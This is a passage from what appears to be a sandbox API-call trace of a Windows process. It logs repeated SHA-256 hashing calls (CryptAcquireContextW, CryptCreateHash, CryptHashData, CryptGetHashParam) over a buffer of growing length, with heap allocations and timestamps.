pbData=0x32e716a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e716a0, pdwDataLen=0xcdfdc) returned 1 [0183.456] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.456] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.456] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.457] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.457] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0183.457] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71100 [0183.457] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e71100, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71100, pdwDataLen=0xcdfdc) returned 1 [0183.457] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.457] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.457] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0183.457] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.457] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x400, dwFlags=0x0) returned 1 [0183.457] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71130 [0183.457] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71130, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71130, pdwDataLen=0xcdfdc) returned 1 [0183.457] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.458] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0183.458] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.458] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.458] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x420, dwFlags=0x0) returned 1 [0183.458] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70fe0 [0183.458] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70fe0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70fe0, pdwDataLen=0xcdfdc) returned 1 [0183.458] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.458] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.458] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.459] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.459] CryptHashData (hHash=0x3396f510, pbData=0x32e786e0, dwDataLen=0x440, dwFlags=0x0) returned 1 [0183.459] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70e00 [0183.459] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x2, pbData=0x32e70e00, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70e00, pdwDataLen=0xcdfdc) returned 1 [0183.459] CryptDestroyHash (hHash=0x3396f510) returned 1 [0183.459] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.459] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.459] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.460] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x460, dwFlags=0x0) returned 1 [0183.460] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71490 [0183.460] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e71490, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71490, pdwDataLen=0xcdfdc) returned 1 [0183.460] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.465] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.465] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.466] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.466] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x480, dwFlags=0x0) returned 1 [0183.466] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.466] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70ce0 [0183.466] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70ce0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70ce0, pdwDataLen=0xcdfdc) returned 1 [0183.466] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.466] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.466] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.467] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.467] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0183.467] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70f50 [0183.467] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70f50, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70f50, pdwDataLen=0xcdfdc) returned 1 [0183.467] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.467] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.467] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0183.467] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.467] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0183.467] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71730 [0183.467] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e71730, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71730, pdwDataLen=0xcdfdc) returned 1 [0183.467] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.467] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0183.468] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0183.468] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.468] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0183.468] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70cb0 [0183.468] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70cb0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70cb0, pdwDataLen=0xcdfdc) returned 1 [0183.468] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.468] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0183.468] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0183.469] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.469] CryptHashData (hHash=0x3396f5f0, pbData=0x32e786e0, dwDataLen=0x500, dwFlags=0x0) returned 1 [0183.469] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.469] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70e60 [0183.469] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e70e60, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70e60, pdwDataLen=0xcdfdc) returned 1 [0183.469] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.469] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0183.469] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0183.470] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.470] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0x520, dwFlags=0x0) returned 1 [0183.470] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.470] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71160 [0183.470] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e71160, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71160, pdwDataLen=0xcdfdc) returned 1 [0183.470] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.470] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0183.470] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0183.471] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.471] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x540, dwFlags=0x0) returned 1 [0183.471] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70b90 [0183.471] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70b90, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70b90, pdwDataLen=0xcdfdc) returned 1 [0183.471] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.501] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0183.502] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0183.502] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.502] CryptHashData (hHash=0x3396f580, pbData=0x32e786e0, dwDataLen=0x560, dwFlags=0x0) returned 1 [0183.502] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.502] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70470 [0183.502] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e70470, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70470, pdwDataLen=0xcdfdc) returned 1 [0183.502] CryptDestroyHash (hHash=0x3396f580) returned 1 [0183.502] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0183.502] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.503] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.503] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0x580, dwFlags=0x0) returned 1 [0183.503] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.503] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70260 [0183.503] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e70260, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70260, pdwDataLen=0xcdfdc) returned 1 [0183.503] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.503] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.503] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0183.504] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.504] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0183.504] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70830 [0183.504] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e70830, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70830, pdwDataLen=0xcdfdc) returned 1 [0183.504] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.504] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0183.504] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338226d0) returned 1 [0183.504] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.504] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0183.504] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e709b0 [0183.504] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e709b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e709b0, pdwDataLen=0xcdfdc) returned 1 [0183.504] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.504] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0183.505] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0183.505] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.505] CryptHashData (hHash=0x3396f580, pbData=0x32e786e0, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0183.505] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.505] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71520 [0183.505] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e71520, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71520, pdwDataLen=0xcdfdc) returned 1 [0183.505] CryptDestroyHash (hHash=0x3396f580) returned 1 [0183.505] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0183.505] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0183.506] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.506] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x600, dwFlags=0x0) returned 1 [0183.506] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70f80 [0183.506] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e70f80, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70f80, pdwDataLen=0xcdfdc) returned 1 [0183.506] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.506] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0183.506] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0183.507] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.507] CryptHashData (hHash=0x3396f510, pbData=0x32e786e0, dwDataLen=0x620, dwFlags=0x0) returned 1 [0183.507] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.507] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71190 [0183.507] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x2, pbData=0x32e71190, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71190, pdwDataLen=0xcdfdc) returned 1 [0183.507] CryptDestroyHash (hHash=0x3396f510) returned 1 [0183.507] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0183.507] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.553] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.553] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0x640, dwFlags=0x0) returned 1 [0183.553] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70e30 [0183.553] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e70e30, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70e30, pdwDataLen=0xcdfdc) returned 1 [0183.553] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.553] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.553] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.554] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.554] CryptHashData (hHash=0x3396f5f0, pbData=0x32e786e0, dwDataLen=0x660, dwFlags=0x0) returned 1 [0183.554] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71550 [0183.554] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e71550, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71550, pdwDataLen=0xcdfdc) returned 1 [0183.554] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.554] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.554] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.554] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.554] CryptHashData (hHash=0x3396f510, pbData=0x32e786e0, dwDataLen=0x680, dwFlags=0x0) returned 1 [0183.554] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.554] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70d10 [0183.554] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x2, pbData=0x32e70d10, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70d10, pdwDataLen=0xcdfdc) returned 1 [0183.554] CryptDestroyHash (hHash=0x3396f510) returned 1 [0183.555] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.555] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0183.555] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.555] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0183.555] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70d70 [0183.555] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e70d70, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70d70, pdwDataLen=0xcdfdc) returned 1 [0183.555] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.555] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0183.555] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.556] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.556] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0183.556] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71610 [0183.556] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e71610, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71610, pdwDataLen=0xcdfdc) returned 1 [0183.556] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.556] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.556] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0183.556] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.556] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0183.557] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: 